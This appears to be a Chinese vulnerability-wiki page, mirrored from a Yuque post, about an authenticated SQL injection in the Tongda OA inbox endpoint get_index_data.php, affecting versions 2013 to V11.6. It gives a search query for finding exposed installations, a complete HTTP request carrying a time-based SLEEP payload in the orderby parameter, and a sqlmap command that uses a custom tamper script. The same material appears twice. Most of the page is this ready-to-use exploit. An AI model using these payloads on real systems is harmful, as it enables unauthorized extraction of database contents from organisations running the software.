fofamini-wiki

登录白背景

源码

通达OA inbox存在后台SQL注入漏洞

通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等，帮助广大用户降低沟通和管理成本，提升生产和决策效率。通达OA inbox存在后台SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。

二、影响版本

通达OA2013-通达OAV11.6

三、资产测绘

hunterapp.name="通达 OA"
特征

四、漏洞复现

利用条件：可登录系统的账户，普通权限即可

登陆后台使用获取到的cookie进行测试

GET /general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=-@%60%27%60%20%20AND%20%28SELECT%205386%20FROM%20%28SELECT%28SLEEP%285%29%29%29rmup%29--%20%27%20&pagelimit=10&tag=&timestamp=1598069103&total= HTTP/1.1
X-Requested-With: XMLHttpRequest
Cookie: {cookie}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Connection: close

sqlmap
TD.py

GET /general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=-@%60%27%60%20&pagelimit=10&tag=&timestamp=1598069103&total= HTTP/1.1
X-Requested-With: XMLHttpRequest
Cookie: {cookie}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Connection: close

sqlmap -r 1.txt --batch -p orderby --tamper=TD

原文: https://www.yuque.com/xiaokp7/ocvun2/tv2cob6ksukx5hgq

# 通达OA inbox存在后台SQL注入漏洞

# 二、影响版本

- 通达OA2013-通达OAV11.6

# 三、资产测绘

- hunter`app.name="通达 OA"`
- 特征

![image.png](./img/wxlMQFZB5bKug_h9/1694870829657-63e4515a-b222-49fe-a8a1-54bcc9cc1af3-129358.png)

# 四、漏洞复现
利用条件：可登录系统的账户，普通权限即可
![image.png](./img/wxlMQFZB5bKug_h9/1702212161748-6f3f99df-9814-46da-b1e4-5676d4d4cdf0-054852.png)
登陆后台使用获取到的cookie进行测试
```
GET /general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=-@%60%27%60%20%20AND%20%28SELECT%205386%20FROM%20%28SELECT%28SLEEP%285%29%29%29rmup%29--%20%27%20&pagelimit=10&tag=×tamp=1598069103&total= HTTP/1.1
X-Requested-With: XMLHttpRequest
Cookie: {cookie}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Connection: close
```
![image.png](./img/wxlMQFZB5bKug_h9/1702393037022-0f7301f0-bdf9-4d1e-818b-f459a1f161b7-530925.png)
sqlmap
[TD.py](https://www.yuque.com/attachments/yuque/0/2024/py/1622799/1709219615974-f248ea42-3050-4718-a1d7-a89df6425f77.py?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fpy%2F1622799%2F1709219615974-f248ea42-3050-4718-a1d7-a89df6425f77.py%22%2C%22name%22%3A%22TD.py%22%2C%22size%22%3A277%2C%22ext%22%3A%22py%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u63b13bb3-9012-4568-bdd5-b11be6b8c24%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22text%2Fx-python-script%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22u2e622979%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)
```
GET /general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=-@%60%27%60%20&pagelimit=10&tag=×tamp=1598069103&total= HTTP/1.1
X-Requested-With: XMLHttpRequest
Cookie: {cookie}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Connection: close
```
```
sqlmap -r 1.txt --batch -p orderby --tamper=TD
```
![image.png](./img/wxlMQFZB5bKug_h9/1702392753677-ddf3abf1-5351-451f-a759-8d17331c3e70-473798.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tv2cob6ksukx5hgq>